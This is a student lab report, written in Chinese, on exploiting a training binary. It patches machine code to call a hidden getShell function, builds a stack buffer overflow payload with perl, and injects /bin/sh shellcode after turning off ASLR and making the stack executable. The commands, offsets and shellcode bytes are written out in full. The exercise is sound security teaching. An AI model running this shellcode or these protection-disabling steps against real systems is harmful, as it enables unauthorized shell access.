2019-2020-2 网络对抗技术 20175217 Exp1 PC平台逆向破解

1、实验目标

• 本次实践的对象是一个名为pwn1的linux可执行文件。

• 该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

• 该程序同时包含另外一个代码片断，getShell，会返回一个可用Shell。正常状况下这个代码是不会被运行的。咱们实践的目标就是想办法运行这个代码片断。咱们将学习两种方法运行这个代码片断，而后学习如何注入运行任何Shellcode。

2、实验内容

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

• 注入一个本身制做的shellcode并运行这段shellcode。

3、基础知识

1.NOP, JNE, JE, JMP, CMP汇编指令的机器码

• NOP：90
• JNE：75
• JE：74
• CMP：38~3D

2.掌握反汇编与十六进制编程器

• 反汇编指令

objdump -d <file(s)>: 将代码段反汇编;
objdump -S <file(s)>: 将代码段反汇编的同时，将反汇编代码与源代码交替显示，编译时须要使用-g参数，即须要调试信息；
objdump -C <file(s)>: 将C++符号名逆向解析
objdump -l <file(s)>: 反汇编代码中插入文件名和行号
objdump -j section <file(s)>: 仅反汇编指定的section

• 十六进制编程器:用来以16进制视图进行文本编辑的工具软件

vim <filename>:
以ASCII码形式显示可执行文件的内容
:%!xxd: 将显示模式切换为16进制模式
:%!xxd： 将16进制切换回ASCII码模式

3.什么是漏洞，漏洞有什么危害？（本身的话）

• 什么是漏洞？
  • 漏洞是与计算机有关的，能够被攻击者利用从而进行攻击的细节。
• 漏洞有什么危害？
  • 漏洞若是被攻击者所利用，就可能给计算机、网络等形成严重损害，可能致使系统破坏、信息泄露、网络崩溃等问题。

4、其余知识

1.管道（|）

• |：是管道命令操做符，简称管道符。利用Linux所提供的管道符“|”将两个命令隔开，管道符左边命令的输出就会做为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会做为 第二个命令的输入，第二个命令的输出又会做为第三个命令的输入，依此类推。

2.输出重定向：

• >：表明以覆盖的方式将命令的正确输出输出到指定的文件或设备当中。

• >>：表明以追加方式输出。

3.输入重定向：

• 命令 < 文件名：把文件做为命令的输入，例如wc命令时统计行，单词书和字符的。

4.EIP

• CPU每次执行控制器读取完，相应的就再经过EIP寄存器去进行下一次的读取指令工做。每次CPU读取指令到指令缓冲区，相应的EIP寄存器的值增长，增长大小的就是读取指令的字节大小。

5.NOP（滑行区）

• 即滑行区，返回地址只要落在任何一个nop上，天然会滑到咱们的shellcode
• 起到填充和“着陆、滑行”的做用

5、实验任务

任务一 直接修改程序机器指令，改变程序执行流程

原理（思路）：

• 1.对目标文件进行反汇编，找到main函数，和要攻击的foo函数
• 2.经过汇编指令找到main函数跳转到foo函数的指令，分析其对应的机器指令
• 3.修改目标文件的对应的机器指令，使得main函数跳转到getShell函数

步骤：

• 对pwn1进行备份，备份为pwn1.bak

• 输入指令objdump -d pwn1 | more对pwn1文件进行反汇编

• 找到main函数跳转到foo函数的指令,对反汇编的结果进行分析
  • 能够看到函数的地址为08048491，main函数中的call 8048491 <foo>指令的机器码为e8 d7 ff ff ff,下一条指令的地址为80484ba。机器码中的0xffffffd7 = 0x080484ba - 0x08048491为主函数执行位置和foo函数起始地址的差
  • 所以，想要让程序执行到getShell需更改call指令的机器码为相应地址的差，计算地址差为0x080484ba - 0x0804847d = 0xffffffc3

• 修改目标文件机器码
  • 输入指令vi pwn1打开以ASCII码显示的文件
  • 输入指令:%!xxd将文件转换为16进制查看
  • 找到d7ffffff位置，输入i进入插入模式，将d7修改成c3
  • 输入指令:%!xxd -r将文件转化为ASCII码形式，保存并退出

• 此时输入指令objdump -d pwn1 | more查看，发现pwn1文件已经被修改了

结果：

• 运行更改后的pwn1，执行getShell，获得shell提示符
• 运行备份pwn1.bak，正常执行foo函数，实现回显功能

任务二 经过构造输入值，形成BOF攻击，从而改变程序执行顺序

原理（思路）：

• 1.经过观察main函数调用的函数，观察系统预留的缓冲区的大小，用该大小加上4字节（ebp），便可得出eip（返回地址）的位置，只要让getShell的地址覆盖该eip就可让程序执行getShell
• 2.经分析可知应该输入缓冲区大小+4字节（ebp）+getShell的地址，使得getShell的地址覆盖eip
• 3.由于咱们无法经过键盘输入16进制值，因此先经过perl语言生成包括这样字符串的一个文件，并使用输出重定向“>”将perl生成的字符串存储到文件input中
• 4.将input的输入，经过管道符“|”，做为目标文件的输入

步骤：

• 经过反汇编指令查看foo函数中为输入预留的空间

• 计算出实现缓冲区溢出的字符数为28+4=32字节（4为EBP占用的内存空间），咱们但愿执行getShell函数，所以须要将getShell函数的地址放在eip（返回地址）处，即33~36字节，接下对猜测进行验证

• 咱们在gdb中输入至少36字节的数据，能够看到给出了Segmentation fault 的错误提示，同时能够查看到eip寄存器的地址为0x34333231 ,验证了将getShell的地址放在33~36字节的猜测

• 咱们将33~36字节的内容替换为getShell的地址，即\x7d\x84\x04\x08，前32字节能够任意输入

• 因为咱们没法从键盘输入16进制的值，所以运用perl语言和>输出重定向构造输入文件perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input构造输入，咱们能够经过cat和xxd指令查看咱们构造的输入文件

结果：

• 而后经过管道符|，输入命令(cat input; cat ) | ./pwn2将构造的输入input做为pwn2的输入并运行，结果以下：

任务三 注入shellcode并执行

原理（思路）：

• 1.设置堆栈可执行、关闭地址随机化
• 2.根据咱们的目的构造shellcode
• 3.以retaddr+nop+shellcode（缓冲区小）或nop+shellcode+retaddr（缓冲区大）的方式构造攻击buf
• 4.先构造一个任意的返回地址（最后不能是\x0a(回车)），而后注入这段buf并运行改进程
• 5.再打开另外一个终端来调试该进程，并找到滑动区nop的地址，以肯定retaddr的值
• 6.用调试肯定的返回值填入retaddr，再次注入此时的buf并运行，便可发现进程成功运行shellcode

步骤：

• execstack -s pwn3设置堆栈可执行
• execstack -q pwn3查询文件的堆栈是否可执行，结果为X表示可执行
• linux系统为了防范shellcode的注入攻击，在屡次运行程序时寄存器的地址会发生改变，所以需关闭地址随机化
  • more /proc/sys/kernel/randomize_va_space查看随机化是否关闭
  • echo "0" > /proc/sys/kernel/randomize_va_space关闭随机化
  • more /proc/sys/kernel/randomize_va_space再次查看，结果为0证实已关闭

• 参考老师给出的代码，咱们首先构造一个input_shellcode

perl -e 'print "A" x 32;print \x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"'
 > input_shellcode

• 在该终端中经过(cat input_shellcode;cat) | ./pwn3运行pwn3
• 在另外一个终端中输入ps -ef | grep pwn3查看pwn3的进程号

• 启用gdb调试并定位pwn3进程
• disassemble foo进行反编译，能够看到ret指令的地址为0x080484ae，在此处设置断点break *0x080484ae

• 在第运行终端中按下回车继续运行， 程序执行到断点中止
• 再在调试终端输入c继续运行程序
• info r esp查看esp寄存器地址,此时esp的地址即为eip的地址
• 输入x/16x 0xffffd1ac以16进制形式查看0xffffd1ac地址后面的内容
• 能够观察到、最早出现0x90（滑行区）的位置地址为0xffffd1ac+0x00000004=0xffffd1b0

• 将注入代码buf的地址改成0xffffd1b0

• 输入(cat input_shellcode;cat) | ./pwn3

结果：

• 成功运行了shellcode

6、遇到的问题和解决

问题一：

• 在作任务一时，改完机器指令后，忘记将其转换成ASCLL码形式，就保存退出了，致使后续没法进行反汇编

解决一：

• 又重作了一遍，记得用:%!xxd -r转成ASCLL码形式就不会出问题

问题二：

• 在参考组长的博客时，发现他任务三，在调试的过程当中，一直不理解为何经过寻找esp的地址，来肯定eip的地址
  

解决二：

• 后来通过组内讨论，发现是本身没有注意到断点的位置ret指令以前，已经执行过leave指令，即已经执行过pop ebp，此时esp已经指向eip了

7、实验心得体会

       以前本身对网络攻防这方面也算是有点兴趣、有点好奇吧，此次，在看了老师的视频讲解以后，本身实操了一把，感受还不错，多是前期看视频、学知识准备的比较久，作完还有那么一点点小成就感。
       此次实验的主要困难就是在于对机器码、汇编指令、十六进制数、堆栈原理的掌握还不是很充分，一些地方理解起来比较费劲，我是看完老师的视频就开始参考着组长的博客开作了，在作的过程当中，有不懂的地方，就直接上网上去查，没有的话就去问同窗，和组内同窗讨论，边作边学，摸着石头过河。
       最后作下来，总体感受仍是不错的，也没有遇到太大的问题，全部遇到问题都获得了解决，对此次的实验内容也有了基本的了解，同时也有了很大的收获。也还有不少地方掌握的不是太好，如机器指令、汇编语言之类的，以后我也会增强学习，争取作的更好！

8、参考连接

• 老师的教程
• 组长的博客